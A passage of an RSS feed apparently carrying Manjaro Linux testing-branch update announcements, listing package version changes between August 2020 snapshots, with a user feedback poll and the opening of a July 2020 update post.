   firefox-developer-edition-i18n-uz             80.0b5-1             80.0b6-1
   firefox-developer-edition-i18n-vi             80.0b5-1             80.0b6-1
   firefox-developer-edition-i18n-xh             80.0b5-1             80.0b6-1
firefox-developer-edition-i18n-zh-cn             80.0b5-1             80.0b6-1
firefox-developer-edition-i18n-zh-tw             80.0b5-1             80.0b6-1
                      firefox-stylus             1.5.11-1             1.5.13-1
              firefox-tree-style-tab             3.5.20-1             3.5.21-1
               firefox-ublock-origin             1.28.4-1             1.29.0-1
                             fractal              4.2.2-2              4.4.0-1
                          freeradius             3.0.21-3             3.0.21-4
                            gearmand            1.1.18-11            1.1.18-12
                         geoipupdate              4.3.0-2              4.3.0-3
                           git-annex      8.20200720.1-13         8.20200810-1
                          git-repair        1.20200504-44        1.20200504-49
                         gnome-boxes             3.36.5-1             3.36.6-1
                             grafana              7.1.1-1              7.1.3-1
                     gtk-layer-shell              0.1.0-2              0.2.0-1
                            gvm-libs             10.0.1-2             10.0.2-1
                           handbrake              1.3.3-2              1.3.3-3
                       handbrake-cli              1.3.3-2              1.3.3-3
                       haskell-aeson            1.5.2.0-9           1.5.2.0-11
         haskell-aeson-better-errors          0.9.1.0-189          0.9.1.0-191
                haskell-aeson-compat            0.3.9-107            0.3.9-109
                  haskell-aeson-diff           1.1.0.9-48           1.1.0.9-50
                haskell-aeson-pretty             0.8.8-54             0.8.8-56
                    haskell-aeson-qq             0.8.3-73             0.8.3-75
                  haskell-aeson-yaml           1.1.0.0-10           1.1.0.0-13
                  haskell-alsa-mixer             0.3.0-44             0.3.0-45
                       haskell-assoc              1.0.1-5              1.0.2-1
                haskell-authenticate            1.3.5-154            1.3.5-159
          haskell-authenticate-oauth          1.6.0.1-127          1.6.0.1-132
                 haskell-auto-update             0.1.6-69             0.1.6-70
                         haskell-aws              0.22-86              0.22-91
            haskell-binary-instances           1.0.0.1-26           1.0.0.1-28
              haskell-binary-orphans             1.0.1-20             1.0.1-22
               haskell-binary-parser             0.5.6-10             0.5.6-12
               haskell-binary-tagged                0.3-7                0.3-9
                  haskell-bower-json          1.0.0.1-187          1.0.0.1-189
                       haskell-brick               0.55-5               0.55-6
            haskell-bsb-http-chunked          0.0.0.4-109          0.0.0.4-110
                    haskell-bv-sized              1.0.1-4              1.0.1-5
   haskell-bytestring-strict-builder           0.4.5.3-81           0.4.5.3-83
     haskell-bytestring-tree-builder           0.2.7.3-52           0.2.7.3-54
                         haskell-bz2           1.0.1.0-12           1.0.1.0-13
                 haskell-casa-client             0.0.1-75             0.0.1-80
                  haskell-casa-types             0.0.1-60             0.0.1-65
                     haskell-cassava           0.5.2.0-35           0.5.2.0-37
          haskell-cassava-megaparsec             2.0.1-37             2.0.1-39
                       haskell-cborg            0.2.4.0-4            0.2.4.0-6
                  haskell-cborg-json           0.2.2.0-34           0.2.2.0-36
                  haskell-cheapskate          0.1.1.2-121          0.1.1.2-126
               haskell-clash-prelude              1.2.4-8             1.2.4-12
                     haskell-concise          0.1.0.1-183          0.1.0.1-185
               haskell-conduit-extra             1.3.5-30             1.3.5-32
                  haskell-config-ini          0.2.4.0-124          0.2.4.0-125
                  haskell-connection             0.3.1-38             0.3.1-39
                   haskell-criterion           1.5.6.2-98          1.5.6.2-104
       haskell-criterion-measurement           0.1.2.0-57           0.1.2.0-59
          haskell-cryptohash-conduit            0.1.1-382            0.1.1-384
          haskell-cryptonite-conduit            0.2.2-276            0.2.2-278
                    haskell-data-fix              0.2.1-2              0.3.0-1
             haskell-data-serializer           0.3.4.1-37           0.3.4.1-39
                haskell-data-textual           0.3.0.3-35           0.3.0.3-37
                         haskell-dav            1.3.4-137            1.3.4-142
                        haskell-dbus            1.2.16-11            1.2.16-15
               haskell-dbus-hslogger           0.1.0.1-63           0.1.0.1-67
              haskell-deferred-folds          0.9.10.1-91          0.9.10.1-93
                 haskell-descriptive            0.9.5-120            0.9.5-122
                         haskell-dns             4.0.1-40             4.0.1-42
                haskell-doctemplates             0.8.2-23             0.8.2-25
        haskell-edit-distance-vector           1.0.0.4-63           1.0.0.4-65
                   haskell-esqueleto           3.3.3.2-15           3.3.3.2-20
                       haskell-extra              1.7.4-1              1.7.4-3
                 haskell-fast-logger             3.0.1-45             3.0.1-46
                  haskell-fdo-notify            0.3.1-315            0.3.1-319
                        haskell-feed           1.3.0.1-34           1.3.0.1-36
                 haskell-filepattern             0.1.2-24             0.1.2-26
                   haskell-filtrable            0.1.4.0-1            0.1.5.0-1
                    haskell-fsnotify          0.3.0.1-107          0.3.0.1-108
           haskell-ghc-lib-parser-ex          8.10.0.15-4          8.10.0.15-6
                          haskell-gi             0.24.0-8            0.24.0-10
                     haskell-git-lfs             1.1.0-10             1.1.0-15
                     haskell-githash           0.1.4.0-65           0.1.4.0-70
                      haskell-gnuidn            0.2.2-172            0.2.2-173
            haskell-hackage-security           0.6.0.1-54           0.6.0.1-59
             haskell-haddock-library             1.9.0-12             1.9.0-14
                      haskell-hakyll          4.13.4.0-17          4.13.4.0-23
                       haskell-hasql            1.4.4.2-5            1.4.4.2-7
                  haskell-hasql-pool             0.5.2-27             0.5.2-29
           haskell-hasql-transaction           1.0.0.1-46           1.0.0.1-48
                    haskell-hedgehog              1.0.3-1              1.0.3-2
                haskell-hjsonpointer            1.5.0-105            1.5.0-107
                 haskell-hledger-lib            1.18.1-11            1.18.1-13
                    haskell-hopenpgp            2.9.4-121            2.9.4-126
                        haskell-hosc               0.18-4               0.18-5
                       haskell-hpack            0.34.2-31            0.34.2-36
                    haskell-hslogger           1.3.1.0-31           1.3.1.0-32
                       haskell-hslua              1.1.2-6              1.1.2-8
         haskell-hslua-module-system             0.2.1-50             0.2.1-52
           haskell-hslua-module-text             0.2.1-59             0.2.1-61
                   haskell-hsopenssl          0.11.4.18-9         0.11.4.18-10
                   haskell-hspec-wai            0.10.1-57            0.10.1-62
              haskell-hspec-wai-json            0.10.1-64            0.10.1-69
                haskell-hsyaml-aeson           0.2.0.0-49           0.2.0.0-51
                haskell-html-conduit           1.3.2.1-87           1.3.2.1-89
                        haskell-http        4000.3.14-236        4000.3.14-242
               haskell-http-api-data           0.4.1.1-40           0.4.1.1-42
                 haskell-http-client             0.7.1-24             0.7.1-30
      haskell-http-client-restricted             0.0.3-10             0.0.3-15
             haskell-http-client-tls          0.3.5.3-268          0.3.5.3-273
                 haskell-http-common            0.8.2.1-3            0.8.2.1-4
                haskell-http-conduit          2.3.7.3-162          2.3.7.3-167
               haskell-http-download           0.2.0.0-94          0.2.0.0-100
                haskell-http-streams           0.8.7.2-14           0.8.7.2-20
                  haskell-http-types            0.12.3-65            0.12.3-67
                       haskell-http2              2.0.5-3              2.0.5-7
                  haskell-httpd-shed          0.4.1.1-162          0.4.1.1-168
                         haskell-hxt         9.3.1.18-110         9.3.1.18-115
          haskell-incremental-parser                0.5-4                0.5-6
               haskell-input-parsers            0.1.0.1-4            0.1.0.1-6
   haskell-insert-ordered-containers           0.2.3.1-24           0.2.3.1-26
                 haskell-interpolate             0.2.1-14             0.2.1-16
                  haskell-io-streams           1.5.1.0-63           1.5.1.0-64
          haskell-io-streams-haproxy           1.0.1.0-63           1.0.1.0-64
                     haskell-iproute             1.7.9-12             1.7.9-13
                       haskell-ipynb           0.1.0.1-59           0.1.0.1-61
                 haskell-ixset-typed               0.5-29               0.5-31
            haskell-jira-wiki-markup              1.2.1-1              1.3.2-1
                        haskell-jose             0.8.3-45             0.8.3-50
                   haskell-js-jquery            3.3.1-470            3.3.1-475
                  haskell-lens-aeson               1.1-48               1.1-50
                      haskell-libmpd           0.9.1.0-25           0.9.1.0-26
                haskell-lifted-async          0.10.0.6-16           0.10.1.1-1
             haskell-microlens-aeson              2.3.1-3              2.3.1-5
                 haskell-microstache          1.0.1.1-164          1.0.1.1-166
                haskell-monad-logger             0.3.34-7            0.3.34-10
                    haskell-mustache            2.3.1-138            2.3.1-143
          haskell-neat-interpolation            0.5.1.1-4            0.5.1.1-6
                     haskell-network           3.1.1.1-25            3.1.2.0-2
                 haskell-network-bsd           2.8.1.0-11           2.8.1.0-12
                  haskell-network-ip           0.3.0.3-41           0.3.0.3-43
           haskell-network-multicast             0.3.2-13             0.3.2-14
                 haskell-network-uri          2.6.3.0-126          2.6.3.0-131
             haskell-openssl-streams           1.2.2.0-66           1.2.2.0-67
                   haskell-optics-th                0.3-3            0.3.0.1-1
             haskell-optparse-simple          0.1.1.2-232          0.1.1.2-237
                haskell-pandoc-types              1.20-50               1.21-1
                      haskell-pantry           0.5.1.1-14           0.5.1.1-20
         haskell-parameterized-utils              2.1.0-4              2.1.0-5
                     haskell-parsers           0.12.10-53           0.12.10-55
                        haskell-path             0.8.0-17             0.8.0-19
                     haskell-path-io             1.6.0-43             1.6.0-45
                  haskell-persistent          2.10.5.2-64          2.10.5.2-69
               haskell-persistent-qq          2.9.1.1-117          2.9.1.1-122
           haskell-persistent-sqlite          2.10.6.2-92          2.10.6.2-97
         haskell-persistent-template           2.8.2.3-69           2.8.2.3-74
             haskell-persistent-test           2.0.3.1-63           2.0.3.1-68
                  haskell-pipes-http            1.0.6-181            1.0.6-186
           haskell-postgresql-binary            0.12.3-10            0.12.3-12
               haskell-prettyprinter              1.6.2-7              1.6.2-9
 haskell-prettyprinter-ansi-terminal              1.1.2-2              1.1.2-4
haskell-prettyprinter-convert-ansi-wl-pprint      1.1.1-5              1.1.1-7
            haskell-project-template            0.2.1.0-6            0.2.1.0-8
        haskell-quickcheck-instances             0.3.23-9            0.3.23-11
           haskell-regex-applicative              0.3.4-1              0.3.4-2
      haskell-regex-applicative-text           0.1.0.1-21           0.1.0.1-22
                       haskell-retry           0.8.1.2-18           0.8.1.2-19
                 haskell-rio-orphans          0.1.1.0-140          0.1.1.0-143
             haskell-rio-prettyprint           0.1.0.0-82            0.1.1.0-1
                    haskell-safecopy            0.10.3-16            0.10.3-18
                         haskell-sbv                8.7-8               8.7-10
                   haskell-serialise           0.2.3.0-20           0.2.3.0-22
                     haskell-servant              0.17-75              0.17-80
              haskell-servant-server              0.17-81              0.17-86
             haskell-servant-swagger             1.1.8-84             1.1.8-90
                       haskell-shake            0.19.1-30            0.19.1-35
                 haskell-shakespeare           2.0.24.1-9          2.0.24.1-11
                      haskell-shelly            1.8.1-117            1.8.1-118
             haskell-simple-sendfile            0.2.30-74            0.2.30-76
                  haskell-singletons               2.7-24               2.7-26
                 haskell-skylighting             0.8.5-18             0.8.5-23
            haskell-skylighting-core             0.8.5-18             0.8.5-23
                   haskell-snap-core           1.0.4.2-10           1.0.4.2-15
                 haskell-snap-server           1.1.1.2-60           1.1.1.2-69
                       haskell-socks             0.6.1-31             0.6.1-32
                   haskell-sourcemap            0.1.6-195            0.1.6-197
                  haskell-statistics          0.15.2.0-35          0.15.2.0-37
                       haskell-store              0.7.5-4              0.7.5-5
           haskell-streaming-commons            0.2.2.0-1            0.2.2.1-1
                      haskell-strict             0.3.2-17                0.4-2
                  haskell-structured                0.1-7                0.1-9
                    haskell-swagger2               2.6-22               2.6-26
           haskell-tagstream-conduit             0.5.6-19             0.5.6-21
       haskell-tamarin-prover-theory            1.4.1-100            1.4.1-102
                 haskell-tar-conduit             0.3.2-92             0.3.2-94
              haskell-tasty-discover             4.2.1-30             4.2.1-31
              haskell-tasty-hedgehog           1.0.0.2-46           1.0.0.2-47
                   haskell-tasty-lua             0.2.2-26             0.2.2-28
                     haskell-texmath          0.12.0.2-49          0.12.0.2-55
                haskell-text-builder           0.6.6.1-52           0.6.6.1-54
                  haskell-text-short             0.1.3-39             0.1.3-41
                   haskell-text-show             3.8.5-19             3.8.5-21
                       haskell-these              1.1.1-1            1.1.1.1-2
                       haskell-tidal              1.6.1-2              1.6.1-3
                haskell-time-manager             0.0.0-66             0.0.0-67
                         haskell-tls             1.5.4-18             1.5.4-19
         haskell-tls-session-manager             0.0.4-58             0.0.4-60
                   haskell-tree-diff              0.1-107              0.1-109
                    haskell-trifecta               2.1-56               2.1-58
                      haskell-turtle            1.5.19-17            1.5.19-19
              haskell-uri-bytestring           0.3.2.2-67           0.3.2.2-68
                  haskell-uri-encode          1.5.0.5-121            1.5.0.6-3
                         haskell-wai           3.2.2.1-75           3.2.2.1-81
              haskell-wai-app-static          3.1.7.1-128          3.1.7.1-133
                 haskell-wai-conduit          3.0.0.4-217          3.0.0.4-220
                    haskell-wai-cors             0.2.7-56             0.2.7-59
                   haskell-wai-extra          3.0.29.2-27          3.0.29.2-32
          haskell-wai-handler-launch           3.0.3.1-91           3.0.3.1-96
                  haskell-wai-logger            2.3.6-105            2.3.6-110
       haskell-wai-middleware-static             0.8.3-42             0.8.3-45
              haskell-wai-websockets          3.0.1.2-151          3.0.1.2-155
                        haskell-warp            3.3.13-17            3.3.13-23
                    haskell-warp-tls             3.3.0-11             3.3.0-16
                  haskell-websockets          0.12.7.1-10          0.12.7.1-12
                       haskell-what4                1.0-7               1.0-11
                        haskell-wreq          0.5.3.2-237          0.5.3.2-242
                 haskell-xml-conduit           1.9.0.0-37           1.9.0.0-39
                  haskell-xml-hamlet          0.5.0.1-112          0.5.0.1-116
                haskell-xss-sanitize            0.3.6-158            0.3.6-163
                        haskell-yaml          0.11.4.0-27          0.11.4.0-29
                       haskell-yesod           1.6.0.2-14            1.6.1.0-1
                  haskell-yesod-auth            1.6.10-82            1.6.10-87
                  haskell-yesod-core            1.6.18-65            1.6.18-70
               haskell-yesod-default            1.2.0-775            1.2.0-780
                  haskell-yesod-form            1.6.7-218            1.6.7-223
            haskell-yesod-persistent          1.6.0.4-162          1.6.0.4-167
                haskell-yesod-static           1.6.1.0-14           1.6.1.0-19
                  haskell-yesod-test            1.6.10-19            1.6.10-24
                           hedgewars             1.0.0-87             1.0.0-88
                                 hey              0.1.3-3              0.1.4-1
                             hiredis             0.14.1-1              1.0.0-1
                             hledger            1.18.1-11            1.18.1-13
                          hledger-ui            1.18.1-17            1.18.1-20
                         hledger-web            1.18.1-26            1.18.1-32
                               hlint              3.1.6-9             3.1.6-11
                              hoogle            5.0.18-12            5.0.18-17
                      hopenpgp-tools            0.23.1-87            0.23.1-92
                             i3-gaps             4.18.2-1             4.18.2-2
                              icmake            9.02.09-1            9.03.01-1
                               idris             1.3.3-40             1.3.3-45
                          jack-stdio                1.5-2                1.6-1
                                josm              16731-1              16812-1
                         kvantum-qt5             0.16.0-1             0.16.1-1
                              lhapdf              6.2.3-6              6.3.0-1
                            libffado              2.4.3-1              2.4.4-1
                        libmaxminddb              1.4.2-1              1.4.3-1
                        libquicktime             1.2.4-22             1.2.4-23
                  libretro-core-info              1.8.9-1              1.9.0-1
                       libretro-play               5761-1               5769-1
                     libretro-ppsspp              27666-1              27686-1
                           libsigrok              0.5.2-4              0.5.2-5
                              luakit                2.1-3                2.2-1
                            minetest              5.3.0-1              5.3.0-2
                     minetest-common              5.3.0-1              5.3.0-2
                     minetest-server              5.3.0-1              5.3.0-2
                               minio         2020.05.16-1         2020.08.08-1
                          mmdblookup              1.4.2-1              1.4.3-1
                               mruby              2.1.1-1              2.1.2-1
                              nageru              1.8.6-6              1.8.6-7
                             netdata             1.23.2-2             1.24.0-1
                              nomacs         1:3.16.224-3        1:3.17.2045-1
                   npm-check-updates              7.0.3-1              7.0.4-1
                          obs-studio             25.0.8-1             25.0.8-2
                             openttd             1.10.2-1             1.10.3-1
                             opnplug              1.0.1-2              1.0.1-3
                                osmo              0.4.2-4              0.4.4-1
                              pandoc          2.9.2.1-115               2.10-1
                     pandoc-citeproc          0.17.0.1-25          0.17.0.1-31
                     pandoc-crossref           0.3.6.3-62            0.3.7.0-1
                                 pcp              5.1.1-2              5.2.0-1
                            pdf2djvu             0.9.17-4           0.9.17.1-1
                               peony              2.2.0-2              3.0.1-1
                perl-module-scandeps               1.27-3               1.28-1
                     perl-test-fatal              0.014-6              0.016-1
                              picard              2.3.2-1                2.4-1
     plasma5-applets-thermal-monitor              1.2.9-3              1.3.0-1
                           playerctl              2.1.1-1              2.2.1-1
                           postgrest             7.0.1-47             7.0.1-53
                              pylama              7.7.1-3              7.7.1-4
                        python-arrow             0.15.7-1             0.15.8-1
                     python-cfn-lint             0.34.0-1             0.34.1-1
                         python-cmd2              1.3.0-1              1.3.2-1
                     python-coverage                5.2-1              5.2.1-1
                  python-distributed             2.21.0-1             2.22.0-1
                         python-dkim              1.0.4-1              1.0.5-1
                       python-docker              4.2.2-1              4.3.0-1
                      python-etesync             0.11.1-2             0.12.0-1
                       python-fsspec              0.7.4-2              0.8.0-1
              python-google-api-core             1.20.0-1             1.22.0-1
     python-google-api-python-client              1.9.3-1             1.10.0-1
                   python-hypothesis            5.23.11-1             5.24.0-1
                        python-ldap3                2.7-2                2.8-1
                       python-libcst              0.3.8-1              0.3.9-1
                          python-mss              5.0.0-1              6.0.0-1
                  python-mysqlclient              2.0.0-1              2.0.1-1
                       python-pandas              1.0.5-1              1.1.0-1
                        python-parso              0.7.1-1              0.8.0-1
                     python-pdfminer           20200720-1           20200726-1
                       python-pg8000             1.16.3-1             1.16.5-1
                    python-pip-shims              0.5.2-1              0.5.3-1
               python-prompt_toolkit              3.0.5-1              3.0.6-1
                 python-pyscreenshot                1.0-1                2.2-1
                    python-reportlab             3.5.46-1             3.5.47-1
                python-requests-file              1.4.3-5              1.5.1-1
                    python-responses            0.10.15-1            0.10.16-1
                       python-schema              0.7.2-1              0.7.3-1
                       python-sphinx              3.1.2-1              3.2.0-1
                        python-sympy              1.6.1-1              1.6.2-1
                   python-tensorflow              2.3.0-2              2.3.0-3
              python-tensorflow-cuda              2.3.0-2              2.3.0-3
               python-tensorflow-opt              2.3.0-2              2.3.0-3
          python-tensorflow-opt-cuda              2.3.0-2              2.3.0-3
                        python-ujson              3.0.0-1              3.1.0-1
                   python-xlsxwriter              1.2.9-1              1.3.2-1
                       python-xxhash              1.4.4-1              2.0.0-1
                    python2-coverage                5.2-1              5.2.1-1
                              rclone             1.52.2-2             1.52.3-1
                        rdiff-backup              2.0.3-1              2.0.5-1
                              remake       4.2.1+dbg1.4-3         4.3+dbg1.5-1
                           retroarch              1.8.9-1              1.9.0-1
              retroarch-assets-ozone              1:325-1              1:327-1
                retroarch-assets-xmb              1:325-1              1:327-1
                      rime-cantonese     0.0.0.20200806-1     0.0.0.20200810-1
                       rust-analyzer           20200803-1           20200810-1
                           s3fs-fuse               1.86-1               1.87-1
                           screenkey                1.1-2                1.2-1
                               sfizz              0.3.2-1              0.4.0-1
                          shellcheck             0.7.1-93             0.7.1-99
                              spdlog              1.7.0-1              1.7.0-2
                               stack             2.3.1-79             2.3.1-86
                     stylish-haskell           0.11.0.3-1           0.11.0.3-4
                         sweethome3d                6.3-1                6.4-1
           switchboard-plug-keyboard              2.3.6-1              2.4.0-1
                      tamarin-prover            1.4.1-391            1.4.1-396
                             taskell            1.9.3.0-1            1.9.3.0-6
                          tensorflow              2.3.0-2              2.3.0-3
                     tensorflow-cuda              2.3.0-2              2.3.0-3
                      tensorflow-opt              2.3.0-2              2.3.0-3
                 tensorflow-opt-cuda              2.3.0-2              2.3.0-3
                         tpm2-pkcs11              1.3.1-1              1.3.2-1
                             unbound             1.11.0-1             1.11.0-2
                            urlwatch               2.21-1               2.21-2
         v2ray-domain-list-community     20200806135215-1     20200810224036-1
                        vim-nerdtree              6.9.3-1              6.9.4-1
                                wabt             1.0.17-1             1.0.19-1
                              waybar              0.9.3-1              0.9.3-3
      wingpanel-indicator-nightlight              2.0.3-1              2.0.4-1
           wingpanel-indicator-sound              2.1.5-1              2.1.6-1
                         x42-plugins           20200714-2           20200714-3
                              xmobar              0.35-14              0.35-19
                                xpra              3.0.9-3              3.0.9-4
                                zmap              2.1.1-7              2.1.1-8
                       distrho-ports                    -         2020.07.14-2
             kxstudio-lv2-extensions                    -         2020.08.08-1
                             libavif                    -              0.8.1-2
                                pqiv                    -               2.11-4
                  python-pytesseract                    -              0.3.5-1


:: Different sync package(s) in repository core x86_64

-------------------------------------------------------------------------------
                             PACKAGE           2020-08-08           2020-08-11
-------------------------------------------------------------------------------
                            iproute2              5.7.0-1              5.8.0-1
                               links             2.20.2-4               2.21-1


:: Different overlay package(s) in repository extra x86_64

-------------------------------------------------------------------------------
                             PACKAGE           2020-08-08           2020-08-11
-------------------------------------------------------------------------------
                                gvim         8.2.1364-0.1         8.2.1412-0.1
             perl-linux-desktopfiles             0.25-2.0             0.25-2.1
                       tuxedo-cc-wmi              0.1.4-1              0.1.5-1
               tuxedo-control-center              1.0.3-2            1.0.3-2.1
                                 vim         8.2.1364-0.1         8.2.1412-0.1
                         vim-runtime         8.2.1364-0.1         8.2.1412-0.1


:: Different sync package(s) in repository extra x86_64

-------------------------------------------------------------------------------
                             PACKAGE           2020-08-08           2020-08-11
-------------------------------------------------------------------------------
                          accerciser             3.36.2-1             3.36.3-1
                              attica             5.72.0-1             5.73.0-1
                        avidemux-cli              2.7.6-1              2.7.6-2
                         avidemux-qt              2.7.6-1              2.7.6-2
                               baloo             5.72.0-1             5.73.0-1
                     bash-completion               2.10-2               2.11-1
                            bluez-qt             5.72.0-1             5.73.0-1
                        breeze-icons             5.72.0-1             5.73.0-1
                            chromium      84.0.4147.105-1      84.0.4147.125-1
                            epiphany             3.36.3-1             3.36.4-1
                           evolution             3.36.4-1             3.36.5-1
                evolution-bogofilter             3.36.4-1             3.36.5-1
               evolution-data-server             3.36.4-1             3.36.5-1
                       evolution-ews             3.36.4-1             3.36.5-1
              evolution-spamassassin             3.36.4-1             3.36.5-1
                 extra-cmake-modules             5.72.0-1             5.73.0-1
                              ffmpeg            2:4.3.1-1            2:4.3.1-2
                         file-roller             3.36.2-1             3.36.3-1
                     flatpak-builder             1.0.10-1             1.0.11-1
                                 fmt              6.2.1-3              7.0.3-1
                frameworkintegration             5.72.0-1             5.73.0-1
                              galera             26.4.4-1             26.4.5-1
                                 gdm             3.36.3-1             3.36.3-3
                       gnome-desktop           1:3.36.4-1           1:3.36.5-1
                    gst-plugins-ugly             1.16.2-3             1.16.2-4
               gtk-update-icon-cache          1:3.24.21-1          1:3.24.22-1
                                gtk3          1:3.24.21-1          1:3.24.22-1
                               gupnp              1.2.3-1              1.2.4-1
                         imagemagick          7.0.10.25-1          7.0.10.26-1
                     imagemagick-doc          7.0.10.25-1          7.0.10.26-1
                         kactivities             5.72.0-1             5.73.0-1
                   kactivities-stats             5.72.0-1             5.73.0-1
                             kapidox             5.72.0-1             5.73.0-1
                            karchive             5.72.0-1             5.73.0-1
                               kauth             5.72.0-1             5.73.0-1
                          kbookmarks             5.72.0-1             5.73.0-1
                       kcalendarcore             5.72.0-1             5.73.0-1
                            kcmutils             5.72.0-1             5.73.0-1
                             kcodecs             5.72.0-1             5.73.0-1
                         kcompletion             5.72.0-1             5.73.0-1
                             kconfig             5.72.0-1             5.73.0-1
                      kconfigwidgets             5.72.0-1             5.73.0-1
                           kcontacts           1:5.72.0-1           1:5.73.0-1
                         kcoreaddons             5.72.0-1             5.73.0-1
                              kcrash             5.72.0-1             5.73.0-1
                                kdav           1:5.72.0-1           1:5.73.0-1
                         kdbusaddons             5.72.0-1             5.73.0-1
                        kdeclarative             5.72.0-1             5.73.0-1
                                kded             5.72.0-1             5.73.0-1
                     kdelibs4support             5.72.0-1             5.73.0-1
                     kdesignerplugin             5.72.0-1             5.73.0-1
                               kdesu             5.72.0-1             5.73.0-1
                           kdewebkit             5.72.0-1             5.73.0-1
                              kdnssd             5.72.0-1             5.73.0-1
                           kdoctools             5.72.0-1             5.73.0-1
                          kemoticons             5.72.0-1             5.73.0-1
                       kfilemetadata             5.72.0-1             5.73.0-1
                        kglobalaccel             5.72.0-1             5.73.0-1
                          kguiaddons             5.72.0-1             5.73.0-1
                           kholidays           1:5.72.0-1           1:5.73.0-1
                               khtml             5.72.0-1             5.73.0-1
                               ki18n             5.72.0-1             5.73.0-1
                         kiconthemes             5.72.0-1             5.73.0-1
                           kidletime             5.72.0-1             5.73.0-1
                       kimageformats             5.72.0-1             5.73.0-1
                               kinit             5.72.0-1             5.73.0-1
                                 kio             5.72.0-1             5.73.0-1
                           kirigami2             5.72.0-1             5.73.0-1
                         kitemmodels             5.72.0-1             5.73.0-1
                          kitemviews             5.72.0-1             5.73.0-1
                         kjobwidgets             5.72.0-1             5.73.0-1
                                 kjs             5.72.0-1             5.73.0-1
                            kjsembed             5.72.0-1             5.73.0-1
                        kmediaplayer             5.72.0-1             5.73.0-1
                           knewstuff             5.72.0-1             5.73.0-1
                      knotifications             5.72.0-1             5.73.0-1
                       knotifyconfig             5.72.0-1             5.73.0-1
                            kpackage             5.72.0-1             5.73.0-1
                              kparts             5.72.0-1             5.73.0-1
                             kpeople             5.72.0-1             5.73.0-1
                           kplotting             5.72.0-1             5.73.0-1
                                kpty             5.72.0-1             5.73.0-1
                        kquickcharts             5.72.0-1             5.73.0-1
                               kross             5.72.0-1             5.73.0-1
                             krunner             5.72.0-2             5.73.0-1
                            kservice             5.72.0-1             5.73.0-1
                         ktexteditor             5.72.0-1             5.73.0-1
                        ktextwidgets             5.72.0-1             5.73.0-1
                     kunitconversion             5.72.0-1             5.73.0-1
                             kwallet             5.72.0-1             5.73.0-1
                            kwayland             5.72.0-1             5.73.0-1
                      kwidgetsaddons             5.72.0-1             5.73.0-1
                       kwindowsystem             5.72.0-1             5.73.0-1
                             kxmlgui             5.72.0-1             5.73.0-1
                       kxmlrpcclient             5.72.0-1             5.73.0-1
                             libebml             1.3.10-2              1.4.0-1
                              libgdm             3.36.3-1             3.36.3-3
                         libmatroska              1.5.2-2              1.6.2-1
                      libphonenumber             8.12.3-1             8.12.7-1
                              libx11             1.6.10-2             1.6.11-1
                             mariadb            10.4.13-1            10.4.14-1
                     mariadb-clients            10.4.13-1            10.4.14-1
                        mariadb-libs            10.4.13-1            10.4.14-1
                            mencoder              38157-2              38157-3
                      mkvtoolnix-cli             47.0.0-1             49.0.0-2
                      mkvtoolnix-gui             47.0.0-1             49.0.0-2
                     modemmanager-qt             5.72.0-1             5.73.0-1
                             mplayer              38157-2              38157-3
                               mytop            10.4.13-1            10.4.14-1
                     nautilus-sendto  3.8.6+14+ge8a3604-2  3.8.6+28+gc87aac4-1
                   networkmanager-qt             5.72.0-1             5.73.0-1
                                orca             3.36.3-1             3.36.4-1
                        oxygen-icons           1:5.72.0-1           1:5.73.0-1
                    oxygen-icons-svg           1:5.72.0-1           1:5.73.0-1
                    perl-alien-build               2.28-1               2.29-1
                        perl-net-dns               1.25-1               1.26-1
                    plasma-framework             5.72.0-1             5.73.0-1
                              prison             5.72.0-1             5.73.0-1
                          prometheus             2.20.0-1             2.20.1-1
                             purpose             5.72.0-1             5.73.0-1
                  qqc2-desktop-style             5.72.0-1             5.73.0-1
                               rsync              3.2.2-2              3.2.3-1
                               solid             5.72.0-1             5.73.0-1
                              sonnet             5.72.0-1             5.73.0-1
                         syndication             5.72.0-1             5.73.0-1
                 syntax-highlighting             5.72.0-1             5.73.0-1
                           syslog-ng             3.28.1-1             3.28.1-2
                        threadweaver             5.72.0-1             5.73.0-1
                         ttf-caladea           20130214-3           20200113-2
                                vala             0.48.8-1             0.48.9-1
                                 vlc             3.0.11-2           3.0.11.1-1
                          x264 3:0.159.r2999.296494a-1 3:0.160.r3011.cde9a93-1
                               xfwm4             4.14.4-1             4.14.5-1
             xorg-fonts-alias-100dpi              1.0.3-5              1.0.4-1
              xorg-fonts-alias-75dpi              1.0.3-5              1.0.4-1
           xorg-fonts-alias-cyrillic              1.0.3-5              1.0.4-1
               xorg-fonts-alias-misc              1.0.3-5              1.0.4-1

</code></pre>
<div class="poll" data-poll-status="open" data-poll-type="regular" data-poll-name="poll">
<div>
<div class="poll-container">
<ul>
<li data-poll-option-id="893d9543968a33fa1039e2d7c2aff9f3">No issue, everything went smoothly</li>
<li data-poll-option-id="f62cf202dc0ce246aa612290c3f33f1f">Yes there was an issue. I was able to resolve it myself.(Please post your solution)</li>
<li data-poll-option-id="e1ee941aacf54cee0c82939acae184cc">Yes i am currently experiencing an issue due to the update. (Please post about it)</li>
</ul>
</div>
<div class="poll-info">
<p>
<span class="info-number">0</span>
<span class="info-label">voters</span>
</p>
</div>
</div>
</div>
<p>Check if your mirror has already synced:</p>
<ul>
<li><a href="https://repo.manjaro.org/">Mirror-Check Service</a></li>
</ul>
            <p><small>2 posts - 1 participant</small></p>
            <p><a href="https://forum.manjaro.org/t/testing-update-2020-08-11-firefox-kde-frameworks-gnome-deepoin-xorg-fonts/44">Read full topic</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[[Testing Update] 2020-07-14 - KDE Frameworks 5.72, Linux57 with FSync, Firefox, Python, Haskell]]></title>
<description><![CDATA[Hello community,
Another testing branch update with some interesting updates for you!
1920×1080Our 11,6" laptop is back! Now with better hardware. Find out more!  #stayhome, #staysafe, #stayhealthy
We updated some of our KDE-git packages

KDE Frameworks 5.72.0 brings needed patches we partly alre...]]></description>
<link>https://tsecurity.de/de/1177956/unix-server/testing-update-2020-07-14-kde-frameworks-572-linux57-with-fsync-firefox-python-haskell/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1177956/unix-server/testing-update-2020-07-14-kde-frameworks-572-linux57-with-fsync-firefox-python-haskell/</guid>
<pubDate>Tue, 14 Jul 2020 11:18:24 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Hello community,</p>
<p>Another <strong>testing</strong> branch update with some interesting updates for you!</p>
